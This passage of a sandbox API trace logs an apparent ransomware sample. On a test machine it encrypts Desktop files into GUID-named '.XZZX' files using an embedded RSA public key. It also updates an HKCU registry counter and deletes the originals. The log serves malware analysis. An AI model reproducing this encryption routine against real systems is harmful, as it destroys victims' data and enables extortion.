KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0165.834] lstrcpyW (in: lpString1=0x29af460, lpString2="oVGbbCOCJnt_S.bmp" | out: lpString1="oVGbbCOCJnt_S.bmp") returned="oVGbbCOCJnt_S.bmp" [0165.834] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0165.834] SetErrorMode (uMode=0x1) returned 0x1 [0165.834] lstrcpyW (in: lpString1=0x29af860, lpString2="oVGbbCOCJnt_S.bmp" | out: lpString1="oVGbbCOCJnt_S.bmp") returned="oVGbbCOCJnt_S.bmp" [0165.834] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x3b4881da, Data2=0xb2a3, Data3=0x43ae, Data4=([0]=0x80, [1]=0x7a, [2]=0x59, [3]=0x33, [4]=0x26, [5]=0xcc, [6]=0x62, [7]=0x6))) returned 0x0 [0165.834] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVGbbCOCJnt_S.bmp") returned 59 [0165.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0165.834] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\297441CE2F3A13CA3B4881DA31D4F812.XZZX") returned 79 [0165.834] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="XZZX") returned 0x0 [0165.834] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVGbbCOCJnt_S.bmp", dwFileAttributes=0x20) returned 1 [0165.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVGbbCOCJnt_S.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovgbbcocjnt_s.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0165.835] ReadFile (in: hFile=0x97c, lpBuffer=0x43f7cf0, nNumberOfBytesToRead=0x17e04, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43f7cf0*, lpNumberOfBytesRead=0x29ae418*=0x17e04, lpOverlapped=0x0) returned 1 [0165.835] CloseHandle (hObject=0x97c) returned 1 [0165.835] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x2cb0000 [0165.836] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x2cc0000 [0165.836] SetErrorMode (uMode=0x1) returned 0x1 [0165.836] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0165.836] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc20f0) returned 1 [0165.838] CryptGenKey (in: hProv=0x3cc20f0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372938) returned 1 [0166.209] CryptExportKey (in: hKey=0x4372938, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0166.209] CryptExportKey (in: hKey=0x4372938, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x2cc0000, pdwDataLen=0x29ae41c | out: pbData=0x2cc0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0166.209] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.210] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0166.210] CryptDestroyKey (hKey=0x4372938) returned 1 [0166.210] CryptReleaseContext (hProv=0x3cc2398, dwFlags=0x0) returned 1 [0166.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\297441CE2F3A13CA3B4881DA31D4F812.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\297441ce2f3a13ca3b4881da31d4f812.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x968 [0166.210] WriteFile (in: hFile=0x968, lpBuffer=0x43f7cf0*, nNumberOfBytesToWrite=0x17e04, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43f7cf0*, lpNumberOfBytesWritten=0x29ae438*=0x17e04, lpOverlapped=0x0) returned 1 [0166.212] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17e04 [0166.212] WriteFile (in: hFile=0x968, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0166.212] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17e09 [0166.212] WriteFile (in: hFile=0x968, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x22, lpOverlapped=0x0) returned 1 [0166.212] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17e2b [0166.212] WriteFile (in: hFile=0x968, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0166.212] SetFilePointer (in: hFile=0x968, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17e30 [0166.212] SetErrorMode (uMode=0x1) returned 0x1 [0166.212] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0166.212] OutputDebugStringW (lpOutputString="end") [0166.213] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0166.213] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0166.213] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x3cc2398) returned 1 [0166.213] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2398, dwCertEncodingType=0x1, pInfo=0x437e6c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e6f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e700*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372938) returned 1 [0166.213] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.214] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0166.214] CryptEncrypt (in: hKey=0x4372938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0166.214] CryptEncrypt (in: hKey=0x4372938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc24a8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc24a8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0166.214] WriteFile (in: hFile=0x968, lpBuffer=0x3cc24a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc24a8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0166.214] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0166.214] WriteFile (in: hFile=0x968, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0166.214] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0166.214] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0166.214] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x974) returned 0x0 [0166.214] RegQueryValueExW (in: hKey=0x974, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xea, lpcbData=0x29adfdc*=0x4) returned 0x0 [0166.214] RegCloseKey (hKey=0x974) returned 0x0 [0166.214] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x974) returned 0x0 [0166.215] RegSetValueExW (in: hKey=0x974, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xeb, cbData=0x4 | out: lpData=0x29adfec*=0xeb) returned 0x0 [0166.215] RegCloseKey (hKey=0x974) returned 0x0 [0166.215] VirtualFree (lpAddress=0x2cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.215] VirtualFree (lpAddress=0x2cc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.215] CloseHandle (hObject=0x968) returned 1 [0166.215] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0166.216] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0166.216] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVGbbCOCJnt_S.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovgbbcocjnt_s.bmp")) returned 1 [0166.217] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVGbbCOCJnt_S.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovgbbcocjnt_s.bmp")) returned 0 Thread: id = 559 os_tid = 0x2cc [0165.991] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0165.991] lstrcpyW (in: lpString1=0x2aaf460, lpString2="P2Yd7s y0s0iE3pixbWf.mp4" | out: lpString1="P2Yd7s y0s0iE3pixbWf.mp4") returned="P2Yd7s y0s0iE3pixbWf.mp4" [0165.991] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0165.991] SetErrorMode (uMode=0x1) returned 0x1 [0165.991] lstrcpyW (in: lpString1=0x2aaf860, lpString2="P2Yd7s y0s0iE3pixbWf.mp4" | out: lpString1="P2Yd7s y0s0iE3pixbWf.mp4") returned="P2Yd7s y0s0iE3pixbWf.mp4" [0165.991] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xee8ef92, Data2=0xa910, Data3=0x4bae, Data4=([0]=0xb8, [1]=0x78, [2]=0xfb, [3]=0x23, [4]=0xdf, [5]=0xc8, [6]=0xaa, [7]=0xf))) returned 0x0 [0165.991] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P2Yd7s y0s0iE3pixbWf.mp4") returned 66 [0165.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0165.991] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B4B65B2031FA98E00EE8EF9234A57D28.XZZX") returned 79 [0165.991] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="XZZX") returned 0x0 [0165.991] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P2Yd7s y0s0iE3pixbWf.mp4", dwFileAttributes=0x20) returned 1 [0165.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P2Yd7s y0s0iE3pixbWf.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p2yd7s y0s0ie3pixbwf.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x978 [0165.992] ReadFile (in: hFile=0x978, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x128e4, lpNumberOfBytesRead=0x2aae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x2aae418*=0x128e4, lpOverlapped=0x0) returned 1 [0165.993] CloseHandle (hObject=0x978) returned 1 [0165.993] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1e30000 [0165.993] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e40000 [0165.993] SetErrorMode (uMode=0x1) returned 0x1 [0165.994] lstrcpyW (in: lpString1=0x2aae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0165.994] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc2398) returned 1 [0165.996] CryptGenKey (in: hProv=0x3cc2398, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x43728b8) returned 1 [0166.188] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2aae41c | out: pbData=0x0*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0166.188] CryptExportKey (in: hKey=0x43728b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1e40000, pdwDataLen=0x2aae41c | out: pbData=0x1e40000*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0166.188] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.188] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0166.188] CryptDestroyKey (hKey=0x43728b8) returned 1 [0166.188] CryptReleaseContext (hProv=0x3cc2398, dwFlags=0x0) returned 1 [0166.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B4B65B2031FA98E00EE8EF9234A57D28.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b4b65b2031fa98e00ee8ef9234a57d28.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x97c [0166.189] WriteFile (in: hFile=0x97c, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x128e4, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x2aae438*=0x128e4, lpOverlapped=0x0) returned 1 [0166.190] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x128e4 [0166.190] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0166.190] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x128e9 [0166.190] WriteFile (in: hFile=0x97c, lpBuffer=0x2aaf860*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x2aaf860*, lpNumberOfBytesWritten=0x2aae438*=0x30, lpOverlapped=0x0) returned 1 [0166.190] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12919 [0166.190] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0166.190] SetFilePointer (in: hFile=0x97c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1291e [0166.190] SetErrorMode (uMode=0x1) returned 0x1 [0166.190] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0166.190] OutputDebugStringW (lpOutputString="end") [0166.191] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Õª\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0166.191] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2aadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8 | out: pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8) returned 1 [0166.191] CryptAcquireContextW (in: phProv=0x2aad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2aad3e4*=0x3cc2398) returned 1 [0166.191] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc2398, dwCertEncodingType=0x1, pInfo=0x437ec78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437eca8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437ecb0*, PublicKey.cUnusedBits=0x0), phKey=0x2aad3ec | out: phKey=0x2aad3ec*=0x43729f8) returned 1 [0166.191] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0166.192] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0166.192] CryptEncrypt (in: hKey=0x43729f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2aad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2aad3f0*=0x80) returned 1 [0166.192] CryptEncrypt (in: hKey=0x43729f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc2420*, pdwDataLen=0x2aad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc2420*, pdwDataLen=0x2aad3e8*=0x80) returned 1 [0166.192] WriteFile (in: hFile=0x97c, lpBuffer=0x3cc2420*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x3cc2420*, lpNumberOfBytesWritten=0x2aae438*=0x80, lpOverlapped=0x0) returned 1 [0166.192] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0166.192] WriteFile (in: hFile=0x97c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0166.192] GetUserNameW (in: lpBuffer=0x2aae1f8, pcbBuffer=0x2aadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2aadfe0) returned 1 [0166.192] wsprintfW (in: param_1=0x2aadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0166.192] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe4 | out: phkResult=0x2aadfe4*=0x988) returned 0x0 [0166.192] RegQueryValueExW (in: hKey=0x988, lpValueName="E1010314", lpReserved=0x0, lpType=0x2aadfd8, lpData=0x2aadfec, lpcbData=0x2aadfdc*=0x4 | out: lpType=0x2aadfd8*=0x4, lpData=0x2aadfec*=0xe9, lpcbData=0x2aadfdc*=0x4) returned 0x0 [0166.192] RegCloseKey (hKey=0x988) returned 0x0 [0166.192] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe8 | out: phkResult=0x2aadfe8*=0x988) returned 0x0 [0166.192] RegSetValueExW (in: hKey=0x988, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2aadfec*=0xea, cbData=0x4 | out: lpData=0x2aadfec*=0xea) returned 0x0 [0166.192] RegCloseKey (hKey=0x988) returned 0x0 [0166.192] VirtualFree (lpAddress=0x1e30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.193] VirtualFree (lpAddress=0x1e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.193] CloseHandle (hObject=0x97c) returned 1 [0166.193] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0166.193] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0166.193] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P2Yd7s y0s0iE3pixbWf.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p2yd7s y0s0ie3pixbwf.mp4")) returned 1 [0166.194] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P2Yd7s y0s0iE3pixbWf.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p2yd7s y0s0ie3pixbwf.mp4")) returned 0 Thread: id = 560 os_tid = 0x118 [0166.218] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 